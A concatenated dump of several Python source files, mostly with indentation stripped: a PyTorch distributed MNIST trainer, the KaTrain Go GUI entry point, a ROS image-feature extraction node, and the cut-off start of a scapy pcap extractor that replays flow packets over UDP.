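# typically wired to a plain Tk root window. The names below (root, job) are
# placeholders; ThreadedJob builds the GUI, starts worker_thread1 and begins polling
# the queue, and pressing the 'Stop' button ends the application.
if __name__ == '__main__':
    root = tk.Tk()
    root.title("Threaded job demo")
    job = ThreadedJob(root)
    root.mainloop()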
|
mnist_lr_grad_avg.py
|
import argparse
import os
import sys
import torch
import torch.distributed as dist
import torch.optim as optim
from math import ceil
from torch.multiprocessing import Process
sys.path.append("../")
from archived.ec2.trainer import Trainer
from archived.ec2 import partition_mnist
from archived.pytorch_model import LogisticRegression
def dist_is_initialized():
if dist.is_available():
if dist.is_initialized():
return True
return False
def run(args):
""" Distributed Synchronous SGD Example """
device = torch.device('cuda' if torch.cuda.is_available() and not args.no_cuda else 'cpu')
torch.manual_seed(1234)
train_loader, bsz, test_loader = partition_mnist(args.batch_size, args.root, download=False)
num_batches = ceil(len(train_loader.dataset) / float(bsz))
model = LogisticRegression()
optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0.9)
trainer = Trainer(model, optimizer, train_loader, test_loader, device)
trainer.fit(args.epochs, is_dist=dist_is_initialized())
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
def run_local():
size = 2
processes = []
for rank in range(size):
p = Process(target=init_processes, args=(rank, size, run))
p.start()
processes.append(p)
for p in processes:
p.join()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--backend', type=str, default='gloo', help='Name of the backend to use.')
parser.add_argument(
'-i',
'--init-method',
type=str,
default='tcp://127.0.0.1:23456',
help='URL specifying how to initialize the package.')
parser.add_argument('-s', '--world-size', type=int, default=1, help='Number of processes participating in the job.')
parser.add_argument('-r', '--rank', type=int, default=0, help='Rank of the current process.')
parser.add_argument('--epochs', type=int, default=20)
parser.add_argument('--no-cuda', action='store_true')
parser.add_argument('-lr', '--learning-rate', type=float, default=1e-3)
parser.add_argument('--root', type=str, default='data')
parser.add_argument('--batch-size', type=int, default=128)
args = parser.parse_args()
print(args)
if args.world_size > 1:
dist.init_process_group(backend=args.backend, init_method=args.init_method, world_size=args.world_size, rank=args.rank)
run(args)
if __name__ == '__main__':
main()
|
__main__.py
|
"""isort:skip_file"""
# first, logging level lower
import os
os.environ["KCFG_KIVY_LOG_LEVEL"] = os.environ.get("KCFG_KIVY_LOG_LEVEL", "warning")
if "KIVY_AUDIO" not in os.environ:
os.environ["KIVY_AUDIO"] = "sdl2" # some backends hard crash / this seems to be most stable
# next, icon
from katrain.core.utils import find_package_resource, PATHS
from kivy.config import Config
from kivy.utils import platform
ICON = find_package_resource("katrain/img/icon.ico")
Config.set("kivy", "window_icon", ICON)
# finally, window size
WINDOW_SCALE_FAC, WINDOW_X, WINDOW_Y = 1, 1300, 1000
try:
from screeninfo import get_monitors
for m in get_monitors():
WINDOW_SCALE_FAC = min(WINDOW_SCALE_FAC, (m.height - 100) / WINDOW_Y, (m.width - 100) / WINDOW_X)
except Exception as e:
if platform != "macosx":
print(f"Exception {e} while getting screen resolution.")
WINDOW_SCALE_FAC = 0.85
Config.set("graphics", "width", max(400, int(WINDOW_X * WINDOW_SCALE_FAC)))
Config.set("graphics", "height", max(400, int(WINDOW_Y * WINDOW_SCALE_FAC)))
Config.set("input", "mouse", "mouse,multitouch_on_demand")
import re
import signal
import sys
import threading
import traceback
from queue import Queue
import urllib3
import webbrowser
from kivy.base import ExceptionHandler, ExceptionManager
from kivy.app import App
from kivy.core.clipboard import Clipboard
from kivy.lang import Builder
from kivy.resources import resource_add_path
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import Screen
from katrain.core.ai import generate_ai_move
from kivy.core.window import Window
from kivy.metrics import dp
from katrain.core.lang import DEFAULT_LANGUAGE, i18n
from katrain.core.constants import (
OUTPUT_ERROR,
OUTPUT_KATAGO_STDERR,
OUTPUT_INFO,
OUTPUT_DEBUG,
OUTPUT_EXTRA_DEBUG,
MODE_PLAY,
MODE_ANALYZE,
HOMEPAGE,
VERSION,
STATUS_ERROR,
STATUS_INFO,
PLAYING_NORMAL,
PLAYER_HUMAN,
)
from katrain.gui.popups import ConfigTeacherPopup, ConfigTimerPopup, I18NPopup
from katrain.core.base_katrain import KaTrainBase
from katrain.core.engine import KataGoEngine
from katrain.core.game import Game, IllegalMoveException, KaTrainSGF
from katrain.core.sgf_parser import Move, ParseError
from katrain.gui.kivyutils import *
from katrain.gui.popups import ConfigPopup, LoadSGFPopup, NewGamePopup, ConfigAIPopup
from katrain.gui.style import ENGINE_BUSY_COL, ENGINE_DOWN_COL, ENGINE_READY_COL, LIGHTGREY
from katrain.gui.widgets import *
from katrain.gui.badukpan import AnalysisControls, BadukPanControls, BadukPanWidget
from katrain.gui.controlspanel import ControlsPanel
class KaTrainGui(Screen, KaTrainBase):
"""Top level class responsible for tying everything together"""
zen = NumericProperty(0)
controls = ObjectProperty(None)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.engine = None
self.new_game_popup = None
self.fileselect_popup = None
self.config_popup = None
self.ai_settings_popup = None
self.teacher_settings_popup = None
self.timer_settings_popup = None
self.idle_analysis = False
self.message_queue = Queue()
self._keyboard = Window.request_keyboard(None, self, "")
self._keyboard.bind(on_key_down=self._on_keyboard_down)
Clock.schedule_interval(self.animate_pondering, 0.1)
def log(self, message, level=OUTPUT_INFO):
super().log(message, level)
if level == OUTPUT_KATAGO_STDERR and "ERROR" not in self.controls.status.text:
if "starting" in message.lower():
self.controls.set_status(f"KataGo engine starting...", STATUS_INFO)
if message.startswith("Tuning"):
self.controls.set_status(
f"KataGo is tuning settings for first startup, please wait." + message, STATUS_INFO
)
return
if "ready" in message.lower():
self.controls.set_status(f"KataGo engine ready.", STATUS_INFO)
if (
level == OUTPUT_ERROR
or (level == OUTPUT_KATAGO_STDERR and "error" in message.lower() and "tuning" not in message.lower())
) and getattr(self, "controls", None):
self.controls.set_status(f"ERROR: {message}", STATUS_ERROR)
def animate_pondering(self, *_args):
if not self.idle_analysis:
self.board_controls.engine_status_pondering = -1
else:
self.board_controls.engine_status_pondering += 5
@property
def play_analyze_mode(self):
return self.play_mode.mode
def toggle_continuous_analysis(self):
if self.idle_analysis:
self.controls.set_status("", STATUS_INFO)
self.idle_analysis = not self.idle_analysis
self.update_state()
def start(self):
if self.engine:
return
self.board_gui.trainer_config = self.config("trainer")
self.engine = KataGoEngine(self, self.config("engine"))
threading.Thread(target=self._message_loop_thread, daemon=True).start()
self._do_new_game()
def update_gui(self, cn, redraw_board=False):
# Handle prisoners and next player display
prisoners = self.game.prisoner_count
top, bot = [w.__self__ for w in self.board_controls.circles] # no weakref
if self.next_player_info.player == "W":
top, bot = bot, top
self.controls.players["W"].active = True
self.controls.players["B"].active = False
else:
self.controls.players["W"].active = False
self.controls.players["B"].active = True
self.board_controls.mid_circles_container.clear_widgets()
self.board_controls.mid_circles_container.add_widget(bot)
self.board_controls.mid_circles_container.add_widget(top)
self.controls.players["W"].captures = prisoners["W"]
self.controls.players["B"].captures = prisoners["B"]
# update engine status dot
if not self.engine or not self.engine.katago_process or self.engine.katago_process.poll() is not None:
self.board_controls.engine_status_col = ENGINE_DOWN_COL
elif len(self.engine.queries) == 0:
self.board_controls.engine_status_col = ENGINE_READY_COL
else:
self.board_controls.engine_status_col = ENGINE_BUSY_COL
self.board_controls.queries_remaining = len(self.engine.queries)
# redraw board/stones
if redraw_board:
self.board_gui.draw_board()
self.board_gui.redraw_board_contents_trigger()
self.controls.update_evaluation()
self.controls.update_timer(1)
# update move tree
self.controls.move_tree.current_node = self.game.current_node
def update_state(self, redraw_board=False): # redirect to message queue thread
self("update_state", redraw_board=redraw_board)
def _do_update_state(
self, redraw_board=False
): # is called after every message and on receiving analyses and config changes
# AI and Trainer/auto-undo handlers
if not self.game or not self.game.current_node:
return
cn = self.game.current_node
last_player, next_player = self.players_info[cn.player], self.players_info[cn.next_player]
if self.play_analyze_mode == MODE_PLAY and self.nav_drawer.state != "open" and self.popup_open is None:
teaching_undo = cn.player and last_player.being_taught and cn.parent
if (
teaching_undo
and cn.analysis_complete
and cn.parent.analysis_complete
and not cn.children
and not self.game.end_result
):
self.game.analyze_undo(cn) # not via message loop
if (
cn.analysis_complete
and next_player.ai
and not cn.children
and not self.game.end_result
and not (teaching_undo and cn.auto_undo is None)
): # cn mismatch stops this if undo fired. avoid message loop here or fires repeatedly.
self._do_ai_move(cn)
Clock.schedule_once(self.board_gui.play_stone_sound, 0.25)
if len(self.engine.queries) == 0 and self.idle_analysis:
self("analyze-extra", "extra", continuous=True)
Clock.schedule_once(lambda _dt: self.update_gui(cn, redraw_board=redraw_board), -1) # trigger?
def update_player(self, bw, **kwargs):
super().update_player(bw, **kwargs)
if self.controls:
self.controls.update_players()
self.update_state()
for player_setup_block in PlayerSetupBlock.INSTANCES:
player_setup_block.update_player_info(bw, self.players_info[bw])
def set_note(self, note):
self.game.current_node.note = note
def _message_loop_thread(self):
while True:
game, msg, args, kwargs = self.message_queue.get()
try:
self.log(f"Message Loop Received {msg}: {args} for Game {game}", OUTPUT_EXTRA_DEBUG)
if game != self.game.game_id:
self.log(
f"Message skipped as it is outdated (current game is {self.game.game_id}", OUTPUT_EXTRA_DEBUG
)
continue
fn = getattr(self, f"_do_{msg.replace('-','_')}")
fn(*args, **kwargs)
if msg != "update_state":
self._do_update_state()
except Exception as exc:
self.log(f"Exception in processing message {msg} {args}: {exc}", OUTPUT_ERROR)
traceback.print_exc()
def __call__(self, message, *args, **kwargs):
if self.game:
if message.endswith("popup"): # gui code needs to run in main kivy thread.
fn = getattr(self, f"_do_{message.replace('-', '_')}")
Clock.schedule_once(lambda _dt: fn(*args, **kwargs), -1)
else: # game related actions
self.message_queue.put([self.game.game_id, message, args, kwargs])
def _do_new_game(self, move_tree=None, analyze_fast=False):
self.idle_analysis = False
mode = self.play_analyze_mode
if (move_tree is not None and mode == MODE_PLAY) or (move_tree is None and mode == MODE_ANALYZE):
self.play_mode.switch_ui_mode() # for new game, go to play, for loaded, analyze
self.board_gui.animating_pv = None
self.engine.on_new_game() # clear queries
self.game = Game(self, self.engine, move_tree=move_tree, analyze_fast=analyze_fast)
if move_tree:
for bw, player_info in self.players_info.items():
player_info.player_type = PLAYER_HUMAN
player_info.player_subtype = PLAYING_NORMAL
player_info.sgf_rank = move_tree.root.get_property(bw + "R")
player_info.calculated_rank = None
player_info.name = move_tree.root.get_property("P" + bw)
self.update_player(bw)
self.controls.graph.initialize_from_game(self.game.root)
# self.controls.rank_graph.initialize_from_game(self.game.root)
self.update_state(redraw_board=True)
def _do_ai_move(self, node=None):
if node is None or self.game.current_node == node:
mode = self.next_player_info.strategy
settings = self.config(f"ai/{mode}")
if settings is not None:
generate_ai_move(self.game, mode, settings)
else:
self.log(f"AI Mode {mode} not found!", OUTPUT_ERROR)
def _do_undo(self, n_times=1):
if n_times == "smart":
n_times = 1
if self.play_analyze_mode == MODE_PLAY and self.last_player_info.ai and self.next_player_info.human:
n_times = 2
self.board_gui.animating_pv = None
self.game.undo(n_times)
def _do_resign(self):
self.game.current_node.end_state = f"{self.game.current_node.player}+R"
def _do_redo(self, n_times=1):
self.board_gui.animating_pv = None
self.game.redo(n_times)
def _do_next_mistake(self):
self.board_gui.animating_pv = None
self.game.redo(999, stop_on_mistake=self.config("trainer/eval_thresholds")[-4])
def _do_cycle_children(self, *args):
self.board_gui.animating_pv = None
self.game.cycle_children(*args)
def _do_switch_branch(self, *args):
self.board_gui.animating_pv = None
self.controls.move_tree.switch_branch(*args)
def _do_play(self, coords):
self.board_gui.animating_pv = None
try:
self.game.play(Move(coords, player=self.next_player_info.player))
except IllegalMoveException as e:
self.controls.set_status(f"Illegal Move: {str(e)}", STATUS_ERROR)
def _do_analyze_extra(self, mode, **kwargs):
self.game.analyze_extra(mode, **kwargs)
def _do_new_game_popup(self):
self.controls.timer.paused = True
if not self.new_game_popup:
self.new_game_popup = I18NPopup(
title_key="New Game title", size=[dp(800), dp(800)], content=NewGamePopup(self)
).__self__
self.new_game_popup.content.popup = self.new_game_popup
self.new_game_popup.open()
def _do_timer_popup(self):
self.controls.timer.paused = True
if not self.timer_settings_popup:
self.timer_settings_popup = I18NPopup(
title_key="timer settings", size=[dp(600), dp(500)], content=ConfigTimerPopup(self)
).__self__
self.timer_settings_popup.content.popup = self.timer_settings_popup
self.timer_settings_popup.open()
def _do_teacher_popup(self):
self.controls.timer.paused = True
if not self.teacher_settings_popup:
self.teacher_settings_popup = I18NPopup(
title_key="teacher settings", size=[dp(800), dp(750)], content=ConfigTeacherPopup(self)
).__self__
self.teacher_settings_popup.content.popup = self.teacher_settings_popup
self.teacher_settings_popup.open()
def _do_config_popup(self):
self.controls.timer.paused = True
if not self.config_popup:
self.config_popup = I18NPopup(
title_key="general settings title", size=[dp(1200), dp(950)], content=ConfigPopup(self)
).__self__
self.config_popup.content.popup = self.config_popup
self.config_popup.open()
def _do_ai_popup(self):
self.controls.timer.paused = True
if not self.ai_settings_popup:
self.ai_settings_popup = I18NPopup(
title_key="ai settings", size=[dp(750), dp(750)], content=ConfigAIPopup(self)
).__self__
self.ai_settings_popup.content.popup = self.ai_settings_popup
self.ai_settings_popup.open()
def load_sgf_file(self, file, fast=False, rewind=True):
try:
move_tree = KaTrainSGF.parse_file(file)
except ParseError as e:
self.log(i18n._("Failed to load SGF").format(error=e), OUTPUT_ERROR)
return
self._do_new_game(move_tree=move_tree, analyze_fast=fast)
if not rewind:
self.game.redo(999)
def _do_analyze_sgf_popup(self):
if not self.fileselect_popup:
popup_contents = LoadSGFPopup()
popup_contents.filesel.path = os.path.abspath(os.path.expanduser(self.config("general/sgf_load", ".")))
self.fileselect_popup = I18NPopup(
title_key="load sgf title", size=[dp(1200), dp(800)], content=popup_contents
).__self__
def readfile(*_args):
filename = popup_contents.filesel.filename
self.fileselect_popup.dismiss()
path, file = os.path.split(filename)
settings_path = self.config("general/sgf_load")
if path != settings_path:
self.log(f"Updating sgf load path default to {path}", OUTPUT_INFO)
self._config["general"]["sgf_load"] = path
self.save_config("general")
self.load_sgf_file(filename, popup_contents.fast.active, popup_contents.rewind.active)
popup_contents.filesel.on_success = readfile
popup_contents.filesel.on_submit = readfile
self.fileselect_popup.open()
self.fileselect_popup.content.filesel.ids.list_view._trigger_update()
def _do_output_sgf(self):
msg = self.game.write_sgf(self.config("general/sgf_save"))
self.log(msg, OUTPUT_INFO)
self.controls.set_status(msg, STATUS_INFO)
def load_sgf_from_clipboard(self):
clipboard = Clipboard.paste()
if not clipboard:
self.controls.set_status(f"Ctrl-V pressed but clipboard is empty.", STATUS_INFO)
return
url_match = re.match(r"(?P<url>https?://[^\s]+)", clipboard)
if url_match:
self.log("Recognized url: " + url_match.group(), OUTPUT_INFO)
http = urllib3.PoolManager()
response = http.request("GET", url_match.group())
clipboard = response.data.decode("utf-8")
try:
move_tree = KaTrainSGF.parse_sgf(clipboard)
except Exception as exc:
self.controls.set_status(
i18n._("Failed to import from clipboard").format(error=exc, contents=clipboard[:50]), STATUS_INFO
)
return
move_tree.nodes_in_tree[-1].analyze(
self.engine, analyze_fast=False
) # speed up result for looking at end of game
self._do_new_game(move_tree=move_tree, analyze_fast=True)
self("redo", 999)
self.log("Imported game from clipboard.", OUTPUT_INFO)
def on_touch_up(self, touch):
if (
self.board_gui.collide_point(*touch.pos)
or self.board_controls.collide_point(*touch.pos)
or self.controls.move_tree.collide_point(*touch.pos)
):
if touch.is_mouse_scrolling:
if touch.button == "scrollup":
self("redo")
elif touch.button == "scrolldown":
self("undo")
return super().on_touch_up(touch)
@property
def shortcuts(self):
return {
"q": self.analysis_controls.show_children,
"w": self.analysis_controls.eval,
"e": self.analysis_controls.hints,
"t": self.analysis_controls.ownership,
"r": self.analysis_controls.policy,
"enter": ("ai-move",),
"numpadenter": ("ai-move",),
"a": ("analyze-extra", "extra"),
"s": ("analyze-extra", "equalize"),
"d": ("analyze-extra", "sweep"),
"f": ("analyze-extra", "alternative"),
"g": ("analyze-extra", "local"),
"p": ("play", None),
"n": ("next-mistake",),
"down": ("switch-branch", 1),
"up": ("switch-branch", -1),
"f5": ("timer-popup",),
"f6": ("teacher-popup",),
"f7": ("ai-popup",),
"f8": ("config-popup",),
}
@property
def popup_open(self) -> Popup:
app = App.get_running_app()
first_child = app.root_window.children[0]
return first_child if isinstance(first_child, Popup) else None
def _on_keyboard_down(self, _keyboard, keycode, _text, modifiers):
if self.controls.note.focus:
return # when making notes, don't allow keyboard shortcuts
popup = self.popup_open
if popup:
if keycode[1] in ["f5", "f6", "f7", "f8"]: # switch between popups
popup.dismiss()
return
else:
return
ctrl_pressed = "ctrl" in modifiers
alt_pressed = "alt" in modifiers
shift_pressed = "shift" in modifiers
shortcuts = self.shortcuts
if keycode[1] == "tab":
self.play_mode.switch_ui_mode()
elif keycode[1] == "shift":
self.nav_drawer.set_state("toggle")
elif keycode[1] == "spacebar":
self.toggle_continuous_analysis()
elif keycode[1] == "b" and ctrl_pressed:
self.controls.timer.paused = not self.controls.timer.paused
elif keycode[1] in ["`", "~", "m"] and ctrl_pressed:
self.zen = (self.zen + 1) % 3
elif keycode[1] in ["left", "z"]:
self("undo", 1 + (alt_pressed or shift_pressed) * 9 + (ctrl_pressed and not alt_pressed) * 999)
elif keycode[1] in ["right", "x"]:
self("redo", 1 + (alt_pressed or shift_pressed) * 9 + (ctrl_pressed and not alt_pressed) * 999)
elif keycode[1] == "home":
self("undo", 999)
elif keycode[1] == "end":
self("redo", 999)
elif keycode[1] == "n" and ctrl_pressed:
self("new-game-popup")
elif keycode[1] == "l" and ctrl_pressed:
self("analyze-sgf-popup")
elif keycode[1] == "s" and ctrl_pressed:
self("output-sgf")
elif keycode[1] == "c" and ctrl_pressed:
Clipboard.copy(self.game.root.sgf())
self.controls.set_status(i18n._("Copied SGF to clipboard."), STATUS_INFO)
elif keycode[1] == "v" and ctrl_pressed:
self.load_sgf_from_clipboard()
elif keycode[1] in shortcuts.keys() and not ctrl_pressed:
shortcut = shortcuts[keycode[1]]
if isinstance(shortcut, Widget):
shortcut.trigger_action(duration=0)
else:
self(*shortcut)
return True
class KaTrainApp(MDApp):
gui = ObjectProperty(None)
language = StringProperty(DEFAULT_LANGUAGE)
def __init__(self):
super().__init__()
def build(self):
self.icon = ICON # how you're supposed to set an icon
self.title = f"KaTrain v{VERSION}"
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "Gray"
self.theme_cls.primary_hue = "200"
kv_file = find_package_resource("katrain/gui.kv")
popup_kv_file = find_package_resource("katrain/popups.kv")
resource_add_path(PATHS["PACKAGE"])
Builder.load_file(kv_file)
Window.bind(on_request_close=self.on_request_close)
Window.bind(on_dropfile=lambda win, file: self.gui.load_sgf_file(file.decode("utf8")))
self.gui = KaTrainGui()
Builder.load_file(popup_kv_file)
return self.gui
def on_language(self, _instance, language):
self.gui.log(f"Switching language to {language}", OUTPUT_INFO)
i18n.switch_lang(language)
self.gui._config["general"]["lang"] = language
self.gui.save_config()
if self.gui.game:
self.gui.update_state()
self.gui.controls.set_status("", STATUS_INFO)
def webbrowser(self, site_key):
websites = {"homepage": HOMEPAGE + "#manual", "support": HOMEPAGE + "#support"}
if site_key in websites:
webbrowser.open(websites[site_key])
def on_start(self):
self.language = self.gui.config("general/lang")
self.gui.start()
def on_request_close(self, *_args):
if getattr(self, "gui", None):
self.gui.play_mode.save_ui_state()
if self.gui.engine:
self.gui.engine.shutdown()
def signal_handler(self, _signal, _frame):
if self.gui.debug_level >= OUTPUT_DEBUG:
print("TRACEBACKS")
for threadId, stack in sys._current_frames().items():
print(f"\n# ThreadID: {threadId}")
for filename, lineno, name, line in traceback.extract_stack(stack):
print(f"\tFile: {filename}, line {lineno}, in {name}")
if line:
print(f"\t\t{line.strip()}")
self.stop()
def run_app():
class CrashHandler(ExceptionHandler):
def handle_exception(self, inst):
ex_type, ex, tb = sys.exc_info()
trace = "".join(traceback.format_tb(tb))
app = MDApp.get_running_app()
if app and app.gui:
app.gui.log(
f"Exception {inst.__class__.__name__}: {', '.join(repr(a) for a in inst.args)}\n{trace}",
OUTPUT_ERROR,
)
else:
print(f"Exception {inst.__class__}: {inst.args}\n{trace}")
return ExceptionManager.PASS
ExceptionManager.add_handler(CrashHandler())
app = KaTrainApp()
signal.signal(signal.SIGINT, app.signal_handler)
app.run()
if __name__ == "__main__":
run_app()
|
feature_extraction_node.py
|
#!/usr/bin/env python3
# Copyright (C) <2020-2021> Intel Corporation
# SPDX-License-Identifier: MIT
import os
import cv2
import numpy as np
import time
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
from image_feature_msgs.msg import ImageFeatures, KeyPoint
from std_msgs.msg import MultiArrayDimension
import threading
import queue
def main():
rospy.init_node('feature_extraction_node')
#========================================= ROS params =========================================
# Available nets: hfnet_vino, hfnet_tf
net_name = rospy.get_param('~net', 'hfnet_tf')
# The user can set more than one input image topic, e.g. /cam1/image,/cam2/image
topics = rospy.get_param('~topics', '/d400/color/image_raw')
# Set gui:=True to pop up a window for each topic showing detected keypoints,
# which will also be published to corresponding keypoints topics (e.g. /cam1/keypoints)
gui = rospy.get_param('~gui', False)
# Every log_interval seconds, performance stats are printed for each topic
log_interval = rospy.get_param('~log_interval', 3.0)
#==============================================================================================
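# e.g. launching with private parameters (the package name below is illustrative, not from this file):
#   rosrun your_package feature_extraction_node.py _net:=hfnet_vino _topics:=/cam1/image,/cam2/image _gui:=true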
if net_name == 'hfnet_vino':
from hfnet_vino import FeatureNet, default_config
elif net_name == 'hfnet_tf':
from hfnet_tf import FeatureNet, default_config
else:
exit('Unknown net %s' % net_name)
config = default_config
#====================================== More ROS params =======================================
# Model path and hyperparameters are provided by the specified net by default, but can be changed,
# e.g., one can set the desired (maximum) number of keypoints with keypoint_number,
# or filter out low-quality keypoints by setting a higher keypoint_threshold
for item in config.keys():
config[item] = rospy.get_param('~' + item, config[item])
#==============================================================================================
net = FeatureNet()
node = Node(net, gui, log_interval)
for topic in topics.split(','):
node.subscribe(topic)
rospy.spin()
class Node():
def __init__(self, net, gui, log_interval):
self.net = net
self.gui = gui
self.log_interval = log_interval
self.cv_bridge = CvBridge()
self.feature_publishers = {}
self.keypoint_publishers = {}
self.subscribers = {}
self.latest_msgs = {}
self.latest_msgs_lock = threading.Lock()
self.stats = {}
self.stats_lock = threading.Lock()
self.result_queue = queue.Queue()
self.worker_thread = threading.Thread(target=self.worker)
self.worker_thread.start()
self.publisher_thread = threading.Thread(target=self.publisher)
self.publisher_thread.start()
def subscribe(self, topic):
base_topic = '/'.join(topic.split('/')[:-1])
self.feature_publishers[topic] = rospy.Publisher(base_topic + '/features', ImageFeatures, queue_size=1)
self.keypoint_publishers[topic] = rospy.Publisher(base_topic + '/keypoints', Image, queue_size=1)
self.stats[topic] = {'received': 0, 'processed': 0, 'last_time': None}
with self.latest_msgs_lock:
self.latest_msgs[topic] = None
callback = lambda msg: self.callback(msg, topic)
self.subscribers[topic] = rospy.Subscriber(topic, Image, callback, queue_size=1, buff_size=2**24)
def callback(self, msg, topic):
# keep only the latest message
with self.latest_msgs_lock:
self.latest_msgs[topic] = msg
with self.stats_lock:
self.stats[topic]['received'] += 1
def worker(self):
while not rospy.is_shutdown():
no_new_msg = True
# take turn to process each topic
for topic in self.latest_msgs.keys():
with self.latest_msgs_lock:
msg = self.latest_msgs[topic]
self.latest_msgs[topic] = None
if msg is not None:
self.process(msg, topic)
with self.stats_lock:
self.stats[topic]['processed'] += 1
no_new_msg = False
self.print_stats(topic)
if no_new_msg: time.sleep(0.01)
def publisher(self):
while not rospy.is_shutdown():
if self.result_queue.qsize() > 5:
rospy.logwarn_throttle(1, 'WOW! Inference is faster than publishing' +
' (%d unpublished results in the queue)\n' % self.result_queue.qsize() +
'Please add more publisher threads!')
try:
res = self.result_queue.get(timeout=.5)
except queue.Empty:
continue
features = res['features']
topic = res['topic']
image = res['image']
header = res['header']
self.result_queue.task_done()
feature_msg = features_to_ros_msg(features, header)
self.feature_publishers[topic].publish(feature_msg)
# drawing keypoints is the most expensive operation in the publisher thread, and
# can be slow when the system workload is high. So we skip drawing the keypoints
# if there are many queued results to be published.
if self.result_queue.qsize() > 2: continue
if self.keypoint_publishers[topic].get_num_connections() > 0 or self.gui:
draw_keypoints(image, features['keypoints'], features['scores'])
if self.keypoint_publishers[topic].get_num_connections() > 0:
keypoint_msg = self.cv_bridge.cv2_to_imgmsg(image, encoding='passthrough')
keypoint_msg.header = header
self.keypoint_publishers[topic].publish(keypoint_msg)
if self.gui:
cv2.imshow(topic, image)
cv2.waitKey(1)
def print_stats(self, topic):
now = rospy.Time.now()
if self.stats[topic]['last_time'] is None:
self.stats[topic]['last_time'] = now
elapsed = (now - self.stats[topic]['last_time']).to_sec()
if elapsed > self.log_interval:
with self.stats_lock:
received = self.stats[topic]['received']
processed = self.stats[topic]['processed']
self.stats[topic]['received'] = 0
self.stats[topic]['processed'] = 0
self.stats[topic]['last_time'] = now
if received > 0:
rospy.loginfo(topic + ': processed %d out of %d in past %.1f sec (%.2f FPS)' % (processed, received, elapsed, processed / elapsed))
else:
rospy.loginfo(topic + ': no message received')
def process(self, msg, topic):
if msg.encoding == '8UC1' or msg.encoding == 'mono8':
image = self.cv_bridge.imgmsg_to_cv2(msg)
image_gray = image
else:
image = self.cv_bridge.imgmsg_to_cv2(msg, 'bgr8')
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
start = time.time()
features = self.net.infer(image_gray)
stop = time.time()
rospy.logdebug(topic + ': %.2f (%d keypoints)' % (
(stop - start) * 1000,
features['keypoints'].shape[0]))
if (features['keypoints'].shape[0] != 0):
res = {'features': features, 'header': msg.header, 'topic': topic, 'image': image}
self.result_queue.put(res)
def draw_keypoints(image, keypoints, scores):
upper_score = 0.5
lower_score = 0.1
scale = 1 / (upper_score - lower_score)
for p,s in zip(keypoints, scores):
s = min(max(s - lower_score, 0) * scale, 1)
color = (255 * (1 - s), 255 * (1 - s), 255) # BGR
cv2.circle(image, tuple(p), 3, color, 2)
def features_to_ros_msg(features, header):
msg = ImageFeatures()
msg.header = header
msg.sorted_by_score.data = False
for kp in features['keypoints']:
p = KeyPoint()
p.x = kp[0]
p.y = kp[1]
msg.keypoints.append(p)
msg.scores = features['scores'].flatten()
msg.descriptors.data = features['local_descriptors'].flatten()
shape = features['local_descriptors'][0].shape
msg.descriptors.layout.dim.append(MultiArrayDimension())
msg.descriptors.layout.dim[0].label = 'keypoint'
msg.descriptors.layout.dim[0].size = shape[0]
msg.descriptors.layout.dim[0].stride = shape[0] * shape[1]
msg.descriptors.layout.dim.append(MultiArrayDimension())
msg.descriptors.layout.dim[1].label = 'descriptor'
msg.descriptors.layout.dim[1].size = shape[1]
msg.descriptors.layout.dim[1].stride = shape[1]
msg.global_descriptor = features['global_descriptor'][0]
return msg
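# Sketch of the inverse operation for a subscriber (not part of this node): rebuild the
# (num_keypoints, descriptor_dim) matrix from the flattened data using the layout filled in above.
# It assumes a single inference batch, as produced by this node.
def descriptors_from_ros_msg(msg):
    num_keypoints = msg.descriptors.layout.dim[0].size
    descriptor_dim = msg.descriptors.layout.dim[1].size
    return np.array(msg.descriptors.data, dtype=np.float32).reshape(num_keypoints, descriptor_dim)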
if __name__ == "__main__":
main()
|
main.py
|
# -*- coding: utf-8 -*-
import os
import time
import socket
import logging
import threading
import yaml
from scapy.all import *
from pathlib import Path
from scapy.layers.inet import ICMP
from scapy.layers.l2 import *
from scapy.layers.inet import IP, UDP
socket.setdefaulttimeout(20)
BUF_SIZE = 1024
SERVER_NUM = 1
def get_logger():
""" 打印的日志文件在本项目目录的/Logs下 """
logger = logging.getLogger()
logging.basicConfig(level=logging.INFO)
rq = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
log_path = os.path.dirname(os.getcwd() + '/Logs/')
if not Path(log_path).is_dir():
os.makedirs(log_path)
log_name = os.path.join(log_path, rq + '.log')
fh = logging.FileHandler(log_name, mode='w')
# fh = logging.FileHandler('./Logs/test.log', mode='w')
fh.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s: %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
class UDPServer:
ipaddr = '10.0.102.79'
port = 9996
family = socket.AF_INET
protocol = socket.SOCK_DGRAM
logger = None
def __init__(self):
""" 只是一个给予python socket库写的发包,
在本次项目中没有用处,但可以做测试
:param logger: 避免全局搜索logger带来的混乱,这里直接传入logger
"""
self.local_ip_address = self.get_local_ip_address()
def get_local_ip_address(self):
""" 获取本地ip地址 """
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
s.close()
return ip
def send(self, data):
""" 发包
:param data: 列表,一次多段发包
:return: 无
"""
import random
self.client = socket.socket(self.family, self.protocol)
self.client.connect((self.ipaddr, self.port))
for d in data:
self.client.sendall(d)
# data_recv = self.client.recvfrom(BUF_SIZE)  # send-only, there is no reply to block on
secs = random.random()
time.sleep(secs)
self.client.close()
class PcapFileExtractor(object):
datagram = []
remote_mac_address = ''
remote_ip_address = '10.0.107.61'
remote_ipv6 = ''
remote_cflow_port = 9996
remote_sflow_port = 6343
pyshark_data = []
def __init__(self, file_path, config):
self.file_path = file_path
self.local_mac_address = self.get_local_mac_address()
self.local_ip_address = self.get_local_ip_address()
self.local_ipv6 = self.get_local_ipv6()
self.__dict__.update(**config)
# for k, v in self.__dict__.items():
# self.logger.info(f"{k}={v}")
def scapy_extractor(self):
""" 使用scapy获取pcap文件中所有的包,并重新生成数据包,放入列表中返回
:return: 含有整理后的数据包的列表
"""
